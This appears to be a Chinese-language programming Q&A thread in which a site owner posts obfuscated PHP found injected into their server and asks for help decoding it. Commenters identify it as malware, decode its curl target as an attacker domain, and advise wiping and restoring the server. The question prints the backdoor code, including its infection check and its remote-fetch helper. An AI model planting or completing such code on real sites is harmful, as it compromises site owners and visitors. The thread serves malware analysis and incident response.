【发布时间】:2021-12-26 05:21:27
【问题描述】:
我已经看到此代码添加到服务器文件中。看起来它是一个恶意代码,我似乎无法对此代码进行反混淆/解密。
<?php
@header('Content-Type:text/html;charset=utf-8');
error_reporting(0); $OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";
global $O;
$O=urldecode($OOOOOO);
if($_GET[$O{21}.$O{15}.$O{2}.$O{24}]==$O{69}.$O{64}.$O{53}.$O{21}.$O{24}){
$oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
$oooOoOoOoOoooooOOooo = explode($O{58}.$O{55}.$O{9}.$O{15}.$O{9},$oooOoOoOoooOooOOooooo);
if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
echo $O{81}.$O{8}.$O{17}.$O{88}.$O{82};
exit;
}else{
echo $O{81}.$O{13}.$O{10}.$O{7}.$O{18}.$O{88}.$O{82};
exit;
}
}
$oOooOO='z0807_1';
$oOooOOoO=$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$oOooOO.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9};
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
$ooooOOOooOo=curl_init();
curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
curl_close($ooooOOOooOo);
return $oooooOOOOooO;
}
【问题讨论】:
-
如果它出现在您的服务器上并且您没有将它放在那里,那么您已经被黑客入侵了。删除整个站点并从上次干净的备份中恢复。
-
您是否仅在 1 个脚本中找到了此代码?
-
我发现这个脚本正在尝试加载您当前文件的内容并将其发送到一个名为:
http://z0807_1.agoods.top的 URL。此网址隐藏在$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$aa.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9};中,其中$aa为 =z0807_1 -
如果您发现某些未知代码已添加到您的站点,请擦除服务器并确保按照所有最佳安全实践重新设置它。您还应该对您的代码进行审核,以确保它没有任何安全问题。完成后,重新部署您的站点。代码的作用并不重要,因为如果有人能够将一段代码放在您的服务器上,他们可能也可以将其他东西放在那里。
-
如果这真的是添加的所有内容,那么 curl 不应该被执行(还)。
标签: php obfuscation